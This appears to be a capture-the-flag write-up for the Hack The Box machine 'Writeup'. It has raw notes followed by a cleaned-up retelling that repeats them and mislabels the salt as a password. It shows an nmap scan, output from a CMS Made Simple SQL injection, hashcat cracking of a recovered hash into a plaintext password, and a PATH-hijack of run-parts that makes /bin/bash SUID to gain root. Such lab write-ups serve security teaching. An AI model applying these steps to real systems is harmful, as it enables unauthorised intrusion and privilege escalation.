# Nmap 7.98 scan initiated Mon Dec 29 13:52:07 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%), Linux 4.19 (90%), Linux 5.0 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 5.379 days (since Wed Dec 24 04:47:57 2025)
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 29 13:53:46 2025 -- 1 IP address (1 host up) scanned in 99.57 seconds

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
➜  Writeup echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
->raykayjay9

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

jkr@writeup:~$ ls -ld /usr/local/bin
drwx-wsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin

# 刚开始我没什么发现，但是当我们ssh到目标是可以看到
2025/12/31 01:34:45 CMD: UID=0     PID=2265   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2025/12/31 01:34:45 CMD: UID=0     PID=2266   | run-parts --lsbsysinit /etc/update-motd.d

jkr@writeup:~$ echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts
jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
jkr@writeup:~$ ls -la /usr/local/bin/run-parts
-rwxr-xr-x 1 jkr staff 33 Dec 31 01:39 /usr/local/bin/run-parts
jkr@writeup:~$ ls -ld /bin/bash
-rwxr-xr-x 1 root root 1099016 May 15  2017 /bin/bash

➜  Writeup ssh jkr@writeup.htb
jkr@writeup.htb's password:

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 31 01:34:46 2025 from 10.10.16.3
-bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1099016 May 15  2017 /bin/bash

-bash-4.4$ /bin/bash -p
bash-4.4# id
uid=1000(jkr) gid=1000(jkr) **euid=0(root)** groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

HTB Writeup

Information Gathering

# Nmap 7.98 scan initiated on Monday, December 29, 2025, at 13:52:07, as follows:
# /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.138
Nmap scan report for 10.10.10.138:
Host is up (latency: 0.23 seconds).
998 TCP ports were not displayed (no response).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Warning: OSScan results may be unreliable because at least 1 open and 1 closed port could not be detected.
Device type: General purpose | Router
Possible operating systems: Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (90%)
OS CPE (Common Platform Enumeration) values: 
cpe:/o:linux:linux_kernel:4, cpe:/o:linux:linux_kernel:5, cpe:/o:linux:linux_kernel:2.6, cpe:/o:linux:linux_kernel:3,
               cpe:/o:mikrotik:routeros:7, cpe:/o:linux:linux_kernel:5.6.3, cpe:/o:linux:linux_kernel:6.0
Most likely operating systems: Linux 4.15–5.19 (97%), Linux 5.0–5.14 (97%), Linux 2.6.32–3.13 (91%),
               Linux 3.10–4.14 (91%), Linux 4.15 (91%), Linux 2.6.32–3.10 (91%), Linux 4.19–5.15 (91%), Linux 4.19 (90%), Linux 5.0 (90%)
No exact OS match found (test conditions were not ideal).
Uptime estimate: 5.379 days (since Wednesday, December 24, 2025, 04:47:57).
TCP sequence prediction difficulty: 261 (Good luck!)
IP ID sequence generation: All zeros.
Service information: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Data files read from: /usr/share/nmap
OS and service detection completed. Please report any incorrect results at: https://nmap.org/submit/
# Nmap completed on Monday, December 29, 2025, at 13:53:46 – 1 IP address (1 host up) scanned in 99.57 seconds.

Vulnerability Analysis

Upon accessing the website, the robots.txt file was checked, and subsequently, the target URL [http://writeup.htb/writeup/](http://writeup.htb/writeup/) was visited. It was discovered that the website is using CMS Made Simple, licensed under Copyright (C) 2004-2019. All rights reserved. A search for CMS Made Simple in 2019 led to the identification of the vulnerability CVE-2019-9053.

Exploitation (User Flag)

After executing the necessary exploits, the following information was obtained:

[+] Password identified: 5a599ef579066807
[+] Username identified: jkr
[+] Email identified: jkr@writeup.htb
[+] Password identified: 62def4866937f08cc13bab43bb14e6f7
➜ Write the password to a file: `hash`
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
-> Output: raykayjay9

You can use the password raykayjay9 to log in to the account jkr via ssh jkr@writeup.htb.

Privilege Escalation (Root Flag)

The user jkr belongs to the staff group, which grants full privileges on the /usr/local directory:

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

To verify this, the contents of the /usr/local/bin directory were listed:

jkr@writeup:~$ ls -ld /usr/local/bin
drwx-wsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin

Finally, the pspy tool was executed to further analyze the system’s security vulnerabilities.

At first, I didn’t find anything significant, but when we SSHed into the target system, we were able to observe the following:

2025/12/31 01:34:45 CMD: UID=0 PID=2265 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts —lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 2025/12/31 01:34:45 CMD: UID=0 PID=2266 | run-parts —lsbsysinit /etc/update-motd.d It seems that run-parts is being executed from the PATH environment variable, which indicates that we have the potential to perform path hijacking.

jkr@writeup:~$ echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts
jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
jkr@writeup:~$ ls -la /usr/local/bin/run-parts
-rwxr-xr-x 1 jkr staff 33 Dec 31 01:39 /usr/local/bin/run-parts
jkr@writeup:~$ ls -ld /bin/bash
-rwxr-xr-x 1 root root 1099016 May 15  2017 /bin/bash

Now, let’s reconnect to the target system to execute our payload.

➜ Writeup ssh jkr@writeup.htb
jkr@writeup.htb's password:

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 31 01:34:46 2025 from 10.10.16.3
-bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1099016 May 15  2017 /bin/bash

-bash-4.4$ /bin/bash -p
bash-4.4# id
uid=1000(jkr) gid=1000(jkr) **euid=0(root)** groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103/netdev)

Lessons Learned